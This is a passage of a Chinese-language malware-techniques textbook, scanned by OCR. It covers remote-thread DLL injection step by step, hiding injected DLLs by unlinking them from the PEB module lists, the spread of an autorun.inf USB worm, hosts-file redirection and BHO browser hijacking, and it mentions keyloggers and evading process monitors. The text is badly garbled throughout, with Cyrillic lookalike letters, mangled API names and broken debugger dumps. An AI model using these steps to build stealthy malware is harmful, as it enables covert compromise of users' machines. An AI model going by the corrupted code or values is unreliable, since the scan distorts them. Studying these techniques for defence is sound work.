LPVOID 1рВезегуеа // 预 留 值 


extern "С" Яес1ѕрес (411ехрогі) 函数 类 型 函数 名 ( 参数) ;  // 导 出 函数 
/7 正文 方式 


} 


还 是 先 来 看 看 DIMain 函 数 参数 的 含义 ， 参 数 一 bModule 即 DLL 目 身 的 实例 句柄 ， 指 回 
DLL 文件 被 映射 进 进程 空间 的 地 址 。 

参数 二 ul reason for call] 是 函数 调用 的 原因 ， 可 以 设置 为 以 下 4 个 值 之 一 。 

> DLL PROCESS ATTACH// 被 进程 加 载 ; 

> DLL PROCESS DETACH// 被 进程 卸载 ; 

> DLL THREAD ATTACH // 进 程 创 建新 进程 时 ; 

> DLL THREAD DETACH // 线 程 终止 时 。 

参数 二 lpReserved， 一 般 不 用 。 
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坷 编译 方式 为 Ct+ 默认 均 为 .cpp) ， 则 需要 接 看 进行 外 链 声 明 ， 即 
extern "С" declspec ( dllexport ) 函数 类 型 函数 名 称 ( 参数 ) ; 


若 编 译 方式 为 C 语 言 ， 则 不 需要 extem 声 明 。 declspec (dllexport) 为 导出 函数 标志 。 
加 载 DLL 的 方式 分 为 动态 链接 和 静态 链接 。 
隐 式 链接 : 


#include<"D11 库 头 文件 .h"> /7/ 加 载 头 文件 


ТЕЗЕ Сушмаш) 调用 DLL 文 件 的 时 候 ， 需 要 前 置 声明 加 载 该 dll 的 LIB 库 (静态 
包含 在 DLL 中 创建 的 函数 等 ) 文件 。 


#pragma comment ( 1ib，"DLIL 文 件 名 .Lib" ) :; 


# 


然后 就 可 以 正常 使 用 DLL 文件 中 的 导出 函数 了 。 
隐 式 链接 的 特点 为 : 使 用 方式 人 简单， 但 被 多 次 调用 时 ， 因 内 存 无 法 释放 使 内 存 开销 


大 ， 从 而 导致 系统 运行 缓慢 。 
显 式 链接 : 
НІМ5ТАКСЕ hInst = LoadLibrary ("DLIL 文 件 名 .d11"); / /映射 内 存 ,得 到 句柄 
typedef 类 型 (*xxx) (); // 定 义 函 数 指针 
ххх 变量 名 = (X X X)GetProcAddress (hInst, "DLL 导出 函数 名 ") ; 
р / /键盘 记 录 功 能 代码 
FreeLibrary (hInst) ; // 释 放 内 存 


显 式 链 接 比 隐 式 链接 复杂 ， 但 被 多 次 调用 时 的 内 存 开销 小 ， 这 也 是 键盘 记录 程序 作为 
首选 的 原因 。 下 面 接 痢 分 析 上 面 函数 : 


HMODULE МТМАРТ LoadLibrary ( 
_ In LPCTSTR lpFileName // 加 载 DLL 文件 进入 内 存 
); 


该 函数 仅 有 一 个 参数 lpFileName， 奇 DLL 文件 和 调用 DLL 的 cpp 原 文件 在 同一 目录 下 ， 
则 参数 可 以 直接 为 “Dll 名 称 .dll”; 奎 不 在 同一 个 目录 下 ， 则 需要 写 清楚 要 加 载 的 DLL 文 
件 的 路 径 。 


FARPROC GetProcAddress ( // 函 数 返回 指定 导出 的 DLL 函数 的 地 址 
HMODULE hModule, // 加 载 进 内 存 的 DLL 句柄 
LPCWSTR lpProcName // 导 出 函数 名 


); 


因为 该 函数 导出 的 是 地 址 信息 ， 所 以 可 以 使 用 相关 指针 进行 接收 。 
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最 后 一 个 函数 如 下 。 
BOOL Freelibrary ( / /释放 加 载 的 DLL ( 类 似 c/C++ 语 言 中 malloc/new 与 
free/delete 的 对 应 关系 ) 
HMODULE hLibModule // 当 前 加 载 的 DLL 句柄 


9.3.2 DLL 注 入 


DLL 注入 又 称 远程 线程 注入 。 大 多 数 木 马 病毒 为 了 提高 自身 隐蔽 性 、 目 标 程序 的 针对 
性 、 进 程 检测 软件 的 胃 避 等 能 力 ， 均 采用 这 种 方式 。 其 中 远程 则 是 基于 线程 之 间 的 ， 即 通 
过 在 目标 程序 下 创建 线程 来 运行 病毒 功能 。 

先 来 了 解 DLL 注 入 需要 用 到 的 函数 ， 然 后 再 通过 其 使 用 步骤 来 认识 它 。 


HANDLE ИТМАРТ OpenProcess(  // 得 到 目标 进程 句柄 


DWORD dwDesiredAccess, / /权限 设 置 
BOOL bInheritHandle, // 句 柄 继承 
DWORD диРгосеззта // 目 标 PID ( 进程 ID ) 


); 


参数 一 dwDesiredAccess 权 限 通常 设置 为 PROCESS ALL ACCESS， 即 享有 全 部 权 
限 。 参 数 二 bInheritHamdle 则 设置 为 FALSE， 即 无 句柄 继承 。 人 参数 三 dwProcessId 则 为 目标 
进程 的 PID 。 调 用 该 函数 得 到 句柄 ， 这 是 假定 为 hPrcoess。 


LPVOID VirtualAllocEx ( // 为 目标 进程 申请 一 段 内 存 空间 
HANDLE hProcess, // 目 标 进程 句柄 
LPVOID lpAddress, // 申 请 内 存 的 起 始 地 址 
DWORD ам$1те, // 内 存 大 小 , 以 字 节 为 单位 
DWORD ПА11осағіопТуре, // 内 存 类 型 
DWORD flProtect // 内 存 权 限 


|; 


参数 一 wProcess 为 OpenProcess 得 到 的 进程 句柄 。 参 数 二 lpAddress 一 般 设置 为 NULL， 
也 就 是 由 系统 决定 申请 内 存 的 起 始 地 址 。 参 数 三 dwsize 分 配 的 大 小 应 为 页 内 存 的 整数 倍 。 参 
数 四 fAllocation Type 一 般 选 择 为 MEM COMMIT， 为 特定 的 页 面 区 域 分 配 内 存 中 或 磁盘 的 页 
面 文件 中 的 物理 存储 空间 。 参 数 五 HProtecf 为 PAGE READWRITE， 即 可 以 读 写 该 区 域 。 


BOOL WriteProcessMemory ( // 将 信息 写 入 内 存 
HANDLE ҺРгосеѕѕ, // 目 标 进 程 句柄 
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LPVOID lpBaseAddress, // 目 标 进 程 内 存 空间 的 首 地 址 
LPVOID lpBuffer, // 写 入 数据 的 缓冲 区 , 包含 写 入 内 存 的 首 地 址 
DWORD nSize, // 写 入 的 字 节 数 


LPDWORD lpNumberOfBytesWritten // 实 际 写 入 的 字 节 数 
); 


参数 二 ]pBaseAddress 即 为 VirtualAllocEx 函 数 申请 到 的 内 存 空间 。 为 了 下 一 步 使 用 远 
程 线 程 注入 DLL， 这 步 就 应 该 将 DLL 文 件 的 具体 路 笃 、 文 件 名 通过 上 述 函 数 写 入 目标 进程 
的 内 存 空间 ， 因 此 VirtualAllocEx 的 参数 三 dwSize 以 及 本 函数 的 参数 四 nSize 则 可 以 是 包含 
DLL 文件 的 具体 路 径 的 字符 串 长 度 。lpBuffer 则 设置 为 DLL 文件 的 具体 路 径 。 


HANDLE CreateRemoteThreadEx ( 


HANDLE hProcess, // 目 标 进 程 句柄 
LPSECURITY ATTRIBUTES lpThreadAttributes, // 定 义 新 线程 的 安全 描 术 符 
SIZE T dwStackSize, // 挫 栈 初 始 大 小 
LPTHREAD START ROUTINE lpStartAddress, // 线 程 函 数 的 起 始 地 址 
LPVOID 1рРагамефег, // 指 针 传 参 

DWORD dwCreationFlags, // 线 程 运行 状态 
LPPROC THREAD ATTRIBUTE LIST lpAttributeList, // 新 线程 附加 参数 
LPDWORD lpThreadId // 返 回 线程 ID 


); 


参数 二 lpThreadAttributes、 参 数 七 ljpAttributeList 以 及 参数 八 lpThreadId 通 常设 置 为 
NULL， 分 别 表 示 无 安全 摘 述 符 、 无 附加 参数 、 无 线程 DD 返回。 参数 三 dwStackSize 若 设置 
为 0， 则 将 以 默认 大 小 运行 程序 。 参 数 四 lpStartAddress 则 设置 为 导出 函数 在 目标 程序 内 存 
中 的 地 址 ，LoadLibrary 函 数位 于 Kermel32.dll 中 ， 几 乎 所 有 进程 局 动 均 会 加 载 kernel32.dl] 模 
块 ， 并 且 在 任何 进程 中 该 函数 地 址 相同 ， 可 以 使 用 GetModuleHandle 函 数 从 Kernel32.dll 中 
获得 DLL 人 句柄， 然后 放 入 GetProcAddress， 进 而 获得 类 型 为 FARPROC 的 LoadLibrary 函 数 加 
载 的 地 址 ， 随 后 转换 其 类 型 为 LPTHREAD START ROUTINE 即 可 。 而 用 于 传 参 的 指针 则 
是 由 VirtualAllocEx 尔 数 返 回 得 到 ， 即 用 于 传递 内 存 分 配 的 信息 。 参 数 dwCreationFlags 设 置 
为 0， 表 示 线 程 被 创建 后 立刻 运行 。 


HMODULE GetModuleHandle ( // 得 到 DLL 文件 模块 句柄 
LPCTSTR lpModuleName / /DLL 模 块 名 


) 


DWORD WaitForSingleobject(  ”// 用 于 等 待 线程 完成 


HANDLE hHandle, / /句柄 对 象 
DWORD dwMilliseconds // 等 待 线程 时 间 间 隔 
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); 


参数 一 hbHamdle 设 置 为 由 CreateRemoteThreadEx 返 回 的 线程 句柄 ， 而 参数 二 
dwMiUiseconcls 则 设置 为 INFINITE， 意 为 无 限 等 待 。 


BOOL VirtualFreeEx ( / /释放 使 用 VirtualAllocEx 分 配 的 内 存 
HANDLE БРгосез5, // 使 用 openProcess 返 回 的 目标 进程 句柄 
LPVOID ТрАй9гезз, // 指 向 VirtualAllocEx 分 配 的 内 存 地 址 


DWORD dwSize, / /释放 的 区 域 大 小 , 这 里 必须 设置 为 0, 与 下 一 个 参数 对 应 
DWORD амЕгеетуре  ”// 自 由 操作 类 型 ,设置 为 MEM RELEASE, , 指向 由 
VirtualAllocEx 分 配 的 区 域 
); 
DLL 注 入 具体 分 为 以 下 几 个 步骤 。 


(1) 通过 目标 程序 的 PID С) ， 使 用 OpenProcess 函 数 得 到 进程 句柄 。 

(2) 使 用 VirtualAllocEx 及 得 到 的 句柄 ， 在 目标 进程 下 创建 一 段 内 存 空 间 。 

(3) 使 用 WriteProcessMemory 将 DLL 文件 的 路 径 信息 写 入 内 存 。 

(4) 使 用 GetModuleHandle 以 及 GetProcAddress 得 到 LoadLibrary 函 数 的 地 址 〈 为 了 使 
用 LoadLibrary 加 载 恶 意 DLL 文件 ， 需 要 得 到 LoadLibrary 函 数 在 进程 中 的 地 址 ) 。 

(5) 使 用 CreateRemoteThreadEx 启 动 远程 线程 ， 加 载 恶 意 DLL 文件 。 

(6) 使 用 WaitForSingleObject 等 待 线程 运行 完毕 退出 。 

(7) 使 用 VirtualFreeEx 释 放 申 请 的 内 存 。 

(8) 使 用 CloseHandle 关 闭 句柄 。 

这 样 病 毒 代码 就 加 载 进 了 正常 程序 内 ， 并 且 进 程 监视 等 软件 无 法 检测 到 病毒 运行 的 存 
在 。 当 然 ， 更 加 巧妙 的 隐藏 目 身 的 方式 也 可 以 将 代码 直接 写 入 目标 进程 ， 那 么 下 列 步骤 中 
的 WriteProcessMemory 就 应 将 代码 写 入 内 存 。 随 后 利用 步骤 (4) 得 到 代码 内 使 用 的 API 函 
数位 于 系统 DLL 文件 在 该 进程 内 存 空 间 的 位 置 ， 那 么 此 步骤 应 在 目标 进程 空间 内 实现 。 为 
了 便于 得 到 写 入 代码 的 大 小 和 地 址 ， 则 往往 将 其 封装 入 结构 体 ， 再 使 用 sizeof〈 结 构 体 》 
以 及 取 地 址 符 &&〈( 结 构 体 就 可 得 到 。 

同时 也 可 以 通过 “隐藏 ”DLL 模块 ， 进 而 隐藏 DLL 文件 名 称 以 及 路 径 来 躲避 检测 工 
具 的 扫 摘 。 这 就 需要 知道 DLL 模块 在 内 存 中 具体 加 载 的 位 置 ， 然 后 才能 对 其 进行 修改 并 
隐藏 。 因 为 DLL 被 用 于 注入 目标 程序 的 内 存 空 间 ， 所 以 在 PEB 中 就 会 保存 该 DLL 模块 的 信 
息 ， 那 么 所 谓 “ 隐 藏 ”， 也 就 是 对 PEB 中 DLL 模块 的 信息 进行 修改 。 

首先 来 看 一 下 32 位 系统 下 的 TEB 结 构 。 在 WinDbg 中 打开 任意 可 执行 程序 ， 随 后 在 
0: 000 > 后 输入 !teb， 显 示 结 果 如 图 9-75 所 示 。 

从 图 9-75 中 可 以 得 出 TEB 及 PEB 的 地 址 (TEB: 7ffdf000h; РЕВ: 7ffdb000h) 。 随 后 
输入 dt teb 7ffdfo00 来 查看 TEB 结 构 信 息 ， 如 图 9-76 所 示 。 
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0:000> !teb 

TEB ағ ?ffdf000 
EzceptionList: 0022Е40с 
StackBase: 00230000 
StackLimit: 0022e000 
SubSy=temTib: 00000000 
FiberData: О000Те00 
ArbitrarvUserPointer: 00000000 
Self: ?ЕЕЧЕОПО 
Епулгоплеп Роз: ег“: 00000000 
С11еп Та: 0000050 . 00000548 
ЕрсНапй!1е: 00000000 
Тіс Storage: 00000000 
РЕВ Address: ?ғғаһайап 
LastErrorValue: 0 
LastStatusValue: 0 
Count Owned Locks: Ü 
HardErrorMode : 0 


9-75 TEB 显 示 结 果 
0:000> dt _teb 7ffdf000 


1149111 ТЕВ 
+0=000 HtTib г. 2 ЫН- 
+0х01с EnvironmentFointer : (null) 
+0=020 ClientId ЕЕ 


+0=028 ÀActiveRpcHandle : (null) 

+0=02с ThreadLocalStoragePointer : (null) 

+0=030 РгосеззЕпутгопиеп# В1оск : 0x7ffdb000 РЕВ 
+0=034 Таз ЕггогУа|ае 1223 

+0=038 Сочи ОЕОтпедСга + 1са15ес 1018 : 0 

+0х03с CsrClientThread : (пч11) 

+0=040 Win32Threadlnfto : (null) 


+0=044 Пзегз2Кезегтед г: 2618 
+0=0ас UserReserved = 151:0 
+0х0с0 WOU32Reserved < са 
+0х0с4 Currentlocale : 0x804 
+0х0с8 Ербо чате а изКечт а ег : 
+0=0сс SvstemReservedl : [54] Да 
+0х1а4 Екхсер 1опСоде r Оа0 
+Üzla8 ActivationConteztStack : АСТТУАТТОН СОНТЕХТ ЗТАСК 
+0х1Ъс брагеВу4е51 г: реми т" 
+0х194 са: ТеБВасЬ > GDI TEB BATCH 
+0ж6Ь4 Ева! Сеп! 19 : _CLIENT_ ID 

图 9-76 TEB 结 构 


这 里 可 以 看 出 PEB 结 构 位 于 TEB 偏 移 0x30 的 地 址 上。 而 TEB 结 构 的 信息 则 存放 于 FS 寄 
存 器 中 ， 那 么 便 可 以 通过 汇编 指令 mov eax, fs: [0x30] 来 得 到 PEB 的 地 址 。 
下 面 来 查看 PEB 结 构 ， 输 入 dt peb 7ffdb000 得 到 PEB 结 构 信 息 ， 如 图 9-77 所 示 。 
0:000> dt рер 0x7tfdb000 ee 


+0=000 InheritedàåddressS5Space : 0 '' 
+0=001 ReadImaqeFileEzecOptionsg : 0 '' 


+0=002 BeingDebugged 2 УЖЕ“ 

+0=003 брагеВоо1 чи «А 

+0=004 Mutant 有 

+0=008 ІмачеВаѕедадге== : 0=00400000 Void 

+0х00с Ldr : 0=00351еа0 РЕВ ІГЕ ГАТА 

+0=010 ProcessParameters : 0=00020000 ЕТІ, USER PROCESS PARAMETERS 
+0=014 SubSystenData : тай 

+0=018 Ргосе==Неар : 0=00250000 Void 

+0=01с FastPebLock 0х7с99а600 ЕТІ, CRITICAL SECTION 


+0=020 ғаз ODL cli : 0ж?с921000 Void 
+0=024 FastPebUnlockRoutine : 0х7с9210е0 Void 


图 9-77 РЕВ 
其 中 有 个 重要 的 参数 ， 相 对 PEB 偏 移 地 址 为 0x0c 的 Ldr 结 构 ， 即 struct РЕВ LDR 
DATA *Ldr， 其 中 Ldr 为 指向 PEB ТОВ DATA 结 构 的 指针 。 
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MSDN 中 PEB 结 构 如 下 。 


typedef struct РЕВ 
{ 
UCHAR InheritedAddressSpace; 
UCHAR ReadImageFileExecOptions; 
UCHAR BeingDebugged; 
UCHAR SpareBool; 
PVOID Mutant; 
PVOID ImageBaseAddress; 
PPEB LDR DATA Ldr; 
} PEB, *РРЕВ; 


现在 再 使 用 WinDbg 查 看 结构 。 输 入 dt РЕВ LDR DATA 0x00351ea0 查 看 РЕВ LDR 
DATA 结 构 〈( 见 图 9-78) 。 


0:000> dt РЕВ ІШЕ БАТА 0х00351еай 
1149111 РЕВ ТОЕ ГАТА 


+0х000 Length : Ож2в 
+0х004 Initialized : 0=1 '' 
+0=008 SsHandle : (null) 


+0=00с InLoadOrderModuleList : 115Т ЕНТЕУ | 0=351ее0 - 0ж352090 | 

+0=014 InMemorvOrderModuleList : 115Т ENTRY | 0=351ее8 - 0=3520а8 | 

+0х01с InlInitializationOrderModuleLis=st : 115Т ЕНТЕУ | 0=351Е58 - 0=3520е0 | 
+0=024 EntryInProgress : (null) 


图 9-78 РЕВ ОВ ОАТА t4 
查阅 MSDN。 


суреаеЕ struct РЕВ DDR БАТА | 


ULONG Length; //+0х00 
BOOLEAN Тп1Е1а11теа; //+0х04 
PVOID $5Напа1е; //+0х08 


LIST ENTRY InLoadOrderModuleList; 
//+Охос а ЕЯ 0 МЕ ПИЯ ТР ==, 
LIST ENTRY InMemoryOrderModuleList; //+0x14 
LIST ENTRY InInitializationOrderModuleList; //+0х1с 
} РЕВ LDR РАТА, *РРЕВ LDR РАТА; 


这 里 的 重点 是 参数 三 InMemoryOrderModuleList 及 参数 四 InLoadOrderModuleList， 首 
先 来 看 看 它 的 类 型 LIST ENTRY。 


typedef struct LIST ENTRY | 
struct LIST ENTRY *Flink;  // 指 向 下 一 个 链表 节点 的 BLink 指 针 
struct LIST ENTRY *Blink;  // 指 向 上 一 个 链表 节点 的 FLink 指 针 
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| LIST ЕМТКҮ, *РЬТЗТ ЕМТВУ, "RESTRICTED POINTER РКЪТ5Т ENTRY; 


该 结构 体 包含 两 个 指针 ， 作 为 链接 模块 节点 的 工具 ， 由 此 可 以 看 出 PEB 中 保存 模板 信 
县 是 以 链表 的 形式 构成 的 ， 并 且 参 数 中 的 每 一 项 指 站 名 为 ТОК DATA TABLE ENTRY 的 
结构 体 : 


typedef struct LDR DATA TABLE ENTRY ( 
PVOID Кезегуей1 [2]; 
LIST ENTRY InMemoryOrderLinks; 
PVOID ReserVed2 [2]; 
PVOID DllBase; //DLL 模 块 地 址 
PVOID EntryPoint; 
PVOID Reserved3; 
UNICODE STRING FullDllName; / /DLL 路 径 名 
BYTE Reserved4[8]; 
PVOID Ве5егуеа5 [3]; 
union í 
ULONG CheckSum; 
PVOID Веѕегуеаб; 
}; 
ULONG TimeDatesStamp; 
} LDR DATA TABLE ENTRY, *РЬОВ DATA TABLE ENTRY; 


很 明显 ， 该 结构 体 存 放 了 程序 以 及 加 载 的 DLL 模块 的 地 址 DI]Base 和 它们 的 路 径 信 
息 ， 也 就 是 UNICODE STRING 类 型 的 参数 FullDIIName。 


Суредег всгисе UNICODE 5ТВТМС | 


USHORT Length; // 长 度 
USHORT Maximumlength; // 最 大 长 度 
PWSTR Buffer; // 缓 冲 区 


} UNICODE STRING; 


隐藏 DLL 的 方式 就 是 : 

(1) 将 保存 注入 的 DLL 文件 模块 的 信息 链 进行 脱 链 操作 。 

(2) (可 选 ) 将 信息 链 中 保存 的 DLL 路 径 及 文件 名 清除 。 

具体 实现 方法 : 

(1) 定位 到 程序 Ldr 的 地 址 ， 以 Ldr 一 InLoadOrderModuleList.Flink 作 为 遍历 模块 的 入 
Но 

(2) НИЖНИЕ ЛОГ. 
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了 


гідам нат — ЕТТІ 
г. але нет | 


зов пълен = 7 а 


而 在 64 位 系统 中 ， 使 用 WinDbg 查 看 同一 程序 的 情况 则 不 同 于 32 位 系统 ， 如 图 9-79、 
图 9-80 所 示 。 
Wowbd TEB at O000000007efdb000 
EzceptionList: 00000000 7=еЕ99000 
СтасКкВазе: 000000000008ЕЯ20 
StackLimit: 0000000000085000 
SubSystenTib: 0000000000000000 
FiberData: ООО0000000000Те00 
àrbitraryUserFointer: 0000000000000000 
Self: 000000007ef db000 
EnvironmentPointer: 0000000000000000 
ClientId: 0000000000001854 0000000000001990 
ЕрсНапй!1 е: 0000000000000000 
Тіс Storage: 0000000000000000 
РЕВ Address: 00000000 7е#ағ 000 
Таз Еггог”а!че: 0 
LastStatusValue: 0 
Count Owned Locks: Ü 
HardErrorMode : 0 
9-79 64 位 TEB 结 构 

0:000> dt teb Пх?еҒаҺйй00 

0:000> dt _teb Пх?еҒаҺ00П 

піа11! TEB 
+0=000 NtTib НТ ТІВ 
+0=038 EnvironmentPointer (null) 
+0=040 ClientId : _СТТЕНТ ІП 
+0=050 ActiveFRpcHandle (null) 
+0=058 ThreadLocalStoragePointer : (null) 


+0х060 ProcessEnvironmentBlock : 
+0х068 Іа=їЕггогЧа1це : Ü 
+0х06с Соча ОЕОктпе4Сга 1са15ес 1015 


+0=070 CsrClientThread (null) 
+0=078 Win32Threadlnto (null) 
+0=080 User32Reserved [25] Ü 


+0=0е8 UserReserved : 1510 
+0=100 WOW32Reserved (null) 


图 9-80 ”32 位 TEB 结 构 


Ux00000000 ?efdt000 РЕВ 


PEB 地 址 偏 移 并 不 是 之 前 的 0x30 了 ， 而 是 0x60， 继 续 查 看 EB 结构 ， 如 图 9-81 所 示 。 


ntdll!_PEB 
+0=000 InheritedàddressSpace : Ü '' 
+0=001 ReadImaqeFileEzecOptionsg : 0 '' 
+0х002 BeingDebugged : 0=1 '' 
+0=003 BitField Ü '' 
+0=003 орнады ЕЕ В : 0у0 
+0=003 IsProtectedProcess : Пу 
+0=003 І=ІечасуРгосе== : 0уй 
+0=003 IsImageDynamicallyRelocated : 0у( 
+0=003 пы Oa e аны : Dw0 
+0=003 брагеВ: 15 
+0=008 Mutant 
+0=010 ImageBaseàddress : 
+0=018 Ldr : 000000000 ` 774292640 
+0=020 ProcessParameters : 0х00000000"00732340. 


图 9-81 ”64 位 PEB 结 构 


Ldr 的 偏 移 地 址 同样 也 发 生 了 改变 ， 偏 移 地 址 改 为 0x18。 


y 
: Üzgffffffff`ffffffff Void 
0=00000000` 00400000 Void 
- РЕВ ІРГЕ ГАТА 
_RTL_USER_PR0CESS_PARAMETERS 


那么 对 应 的 FS 寄存 器 中 的 值 也 需要 进行 改变 。 接 下 来 ， 介 绍 另 一 种 方式 即使 用 API 函 


数 进行 获取 PEB 地 址 的 操作 。 


МІМАРІ NtQueryInformationProcess( 


HANDLE ProcessHandle., 


PROCESSINFOCLASS ProcessInformationClass, 


— РЕГ — 


// 检 索 指 定 进程 的 信息 
// 进 程 句柄 
/ /检索 信 息 类 型 
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PVOID ProcessInformation, // 写 入 信息 的 缓冲 区 
ULONG ProcessInformationLength, // 缓 冲 区 大 小 
PULONG ReturnLendth // 返 回信 息 大 小 


参数 一 指定 为 目标 进程 句柄 ， 参 数 二 ProcessInformationClass 可 取 下 列 值 。 


typedef enum PROCESSINFOCLASS ( 


ProcessBasicInformation, / /PEB 结 构 信息 
ProcessDebugPort, // 调 试 端口 


ProcessQuotaLimits, 

ProcessIoCounters, 

ProcessVmCounters, 

ProcessTimes, 

ProcessBasePriority, 

ProcessRaisePriority, 

ProcessDebugPort, // 检 索 DWORD PTR 类 型 ,调试 程序 的 端口 号 
РгосеѕѕЕхсерііопрРог+, 

Ргосе55Ассе55Токеп, 

ProcessLdtInformation, 

Ргосезз19Е 81 ге, 

РгосеззПеГац! СНагдЕггогМоде, 

РгосеззТоРогТтНапяЯтегз, 

РгосеззРоо1 ед0задеАпа пи 15, 
ProcessWorkingSetWatch, 

ProcessUserModeIOPL, 
ProcessEnableAlignmentFaultFixup, 
ProcessPriorityClass, 

ProcessWx86Information, 

ProcessHandleCount, 

ProcessAffinityMask, 

ProcessPriorityBoost, 

ProcessDeviceMap, 

ProcessSessionInformation, 
ProcessForegroundInformation, 
ProcessWow64Information，// 程 序 运 行 的 环境 是 否 为 64 位 系统 
ProcessImageFileName，// 检 索 UNICODE STRING 类 型 ,包含 图 像 文件 的 名 称 
ProcessLUIDDeviceMapsEnabled, 
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ProcessBreakonTermination，// 检 索 ULONG 类 型 , 指示 程序 关键 处 
ProcessDebugObjectHandle, 
ProcessDebugFlags, 
ProcessHandleTracing, 
ProcessIoPriority, 
РгосеѕѕЕхесиіеЕ1адѕ, 
ProcessTlsInformation, 
ProcessCookie, 
ProcessImageInformation, 
ProcessCycleTime, 
ProcessPagePriority, 
ProcessInstrumentationCallback, 
ProcessThreadStackAllocation, 
ProcessWorkingSetWatchEx, 
ProcessImageFileNameWin32, 
ProcessImageFileMapping, 
ProcessAffinityUpdateMode, 
ProcessMemoryAllocationMode, 
ProcessGroupInformation, 
ProcessTokenVirtualizationEnabled, 
ProcessConsoleHostProcess, 
ProcessWindowInformation, 
MaxProcessInfoClass 


} PROCESSINFOCLASS; 


这 里 ， 显 然 取 ProcessBasicInformation， 其 中 保存 了 PEB 结 构 信 息 。 


СуреаеЕ struict PROCESS BASIC INFORMATION | 
РУОТО Вез5егуеа1; 
РРЕВ РебВаз5еАааге55; 
PVOID Веѕегуеа? [2]; 
ULONG РТК ОптапеРгосеззта; 
PVOID Reserved3; 
} PROCESS BASIC INFORMATION; 


该 结构 体 的 参数 二 即 为 PEB 结 构 的 基地 址 ， 也 正 是 我 们 需要 得 到 的 信息 。 
函数 中 参数 三 ProcessInformation 用 来 接收 PEB 信 息 的 缓冲 区 〈 以 PROCESS BASIC ` 
INFORMATION 类 型 声明 缓冲 区 接收 信息 ) ， 参 数 四 ProcessInformationLength 表 示 信 息 的 
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大 小 〈sizeof 即 可 ) 。 该 函数 并 未 被 微软 公开 ， 因 此 需要 使 用 GetProcAddress 和 LoadLibrary 
从 Ntdlldll 中 获取 该 函数 地 址 。 调 用 该 函数 以 后 ， 便 得 到 了 PEB 结 构 的 地 址 。 


033 autorun.inf 一 一 风靡 一 时 


U 熏 病毒 在 2007 年 大 规模 爆发 ， 并 且 和 危害 很 大 。2011 年 ， 随 看 微软 发 布 名 为 KB967940 
的 补丁 后 ，U 盘 病毒 在 XP 系 统 下 主动 传播 功能 近乎 失效 ， 如 今 在 Windows 7/8 甚 至 10 普 及 的 今 
天 ，U 盘 病毒 更 是 失去 了 效果 ， 但 其 原理 却 是 值得 一 探究 竟 的 。 

病毒 主要 利用 了 autorun.inf 的 特性 一 一 随 U 盘 打开 而 自动 运行 的 功能 。 以 记事 本 的 形式 
打开 该 文件 ， 则 文件 如 图 9-82 所 示 。 

autorun.inf 文 件 ( 见 图 9-83) 格式 一 般 如 下 : 

[AutoRun | 

open= 打 开 的 程序 

该 程序 往往 是 隐藏 在 U 盘 中 的 病毒 文件 。 下 面 的 shell 等 同样 也 起 到 打开 文件 的 作用 。 


格式 (O) 


ellexecute=coink. exe 
C D ань 
= К) в Ша (一 


图 9-82 autorun.inf(1) | 9-83 aaa | 

就 本 例 来 说 ， 内 置 该 文件 的 U 盘 被 双击 打开 以 后 ， 会 目 动 运行 coink.exe 病 毒 。 该 病毒 
则 会 将 目 身 复制 进 系 统 目 录 ， 然 后 添加 到 目 局 项 ， 实 现 木马 病毒 等 功能 。 该 病毒 通过 监控 
USB 接 口 信息 ， 一 旦 检测 到 有 U 盘 插入 ， 则 复制 目 身 进入 U 盘 并 创建 改写 U 盘 的 autorun.inf 
文件 ， 然 后 通过 隐藏 目 身 来 实现 感染 U 盘 的 目的 ， 进 而 继续 进行 传播 。 接 下 来 具体 认识 它 
的 这 些 功能 是 如 何 实现 的 。 

病毒 一 般 会 创建 三 个 文件 ， 在 系统 根 目 录 下 和 U 盘 中 创建 目 身 ， 即 可 执行 病毒 (ехе. 
com 等 文件 ) ; 在 U 盘 里 创建 或 替换 autorun.inf 文 件 。 

病毒 检测 U 盘 的 手段 并 不 神秘 ， 不 过 是 使 用 了 GetDriveIype 函 数 而 已 。 


UINT ИТМАРТ GetDriveType ( 
LPCTSTR lpRootPathName // ЖАЖА 
); 


参数 显然 为 盘 符 的 名 称 了 ， 例 如 C: 。 函 数 的 返回 值 若 为 DRIVE КЕМОУАВІЕ, 
则 表示 是 移动 存储 设备 ， 如 U 盘 等 ， 若 为 DRIVE FIXED， 则 为 固定 硬盘 ; 若 为 DRIVE 
CDROM， 则 为 光驱 。 然 后 将 这 个 函数 放 入 循环 ， 每 隔 一 段 时 间 检 测 全 部 磁盘 就 实现 了 检 
测 U 熏 的 功能 。 

紧 接 看 就 是 隐藏 目 身 文件 的 功能 ， 代 码 如 下 所 示 。 
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BOOL SetFileAttributes 
LPCTSTR lpFileName, / /文件 详细 路 径 
DWORD dwAttributes // 文 件 属性 
); 


文件 路 径 也 就 是 autorun.inf 以 及 病毒 程序 的 具体 路 径 ， 文 件 属性 则 设置 为 FILE_ 
ATTRIBUTE _ HIDDEN， 那 么 文件 就 被 隐藏 了 。 
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本 小 节 讲 述 的 是 病毒 的 各 种 劫持 方式 。 
1. яя 


(1) Боз ЕР 

hosts СЛ. 9-84) 文件 路 径 一 般 为 C: \Windows\System32\driversvetc， 可 以 用 记事 本 
打开 ， 其 作用 是 加 快 域名 访问 速度 ， 也 就 是 当 用 户 输入 某 网 址 并 访问 时 ， 铬 hosts 中 存 有 该 
网 址 与 对 应 IP 则 会 通过 该 IP 解 析 并 访问 该 网 站 。 因 此 ， 病 毒 也 会 通过 修改 对 应 网 站 的 IP， 
将 用 户 输入 的 网 址 支持 至 指定 人 的 网 站 ， 这 是 hosts 支 持 。 


#46. 61. 155. 222 google. com 

#46. 61. 155. 222 www. google. com 

#46. 61. 155. 222 m. google. com 

#46. 61. 155.222 scholar. google. соп 
#46. 61. 155. 222 translate. google. соп 
#46. 61. 155. 222 books. google. соп 
#46. 61. 155.222 арреп=іпе. google. соп 
#46. 61. 155.222 maps. google. соп 

#46. 61. 155.222 news. google. com 

#46. 61. 155. 222 images. google. сот 
#46. 61. 155.222 finance. google. com 
#46. 61. 155, 222 history. google. com 
#46. 61. 155, 222 drive. google. соп 
#46. 61. 155.222 docs. google. com 

#46. 61. 155. 222 plus. google. соп 

#46. 61. 155.222 play. google. соп 

#46. 61. 155. 222 calendar. google. соп 


89-84 ”hosts 文件 
(2) BHO 动 持 
BHO (Browser Helper Object， 浏 览 器 辅助 对 象 〉 是 浏览 器 与 程序 员 之 间 开 放 人 交互 接 
口 的 业界 标准 。 程 序 员 通 过 这 个 接口 可 以 编写 代码 控制 浏览 器 的 行为 别有用心 的 病毒 编 
与 者 则 会 用 此 劫持 浏览 器 ， 如 复 改 正 主页 、 弹 广告 等 。 
BHO 在 注册 表 中 的 位 置 是 HREY LOCAL MACHINE SOFTWAREN MicrosoftNWindows,N 
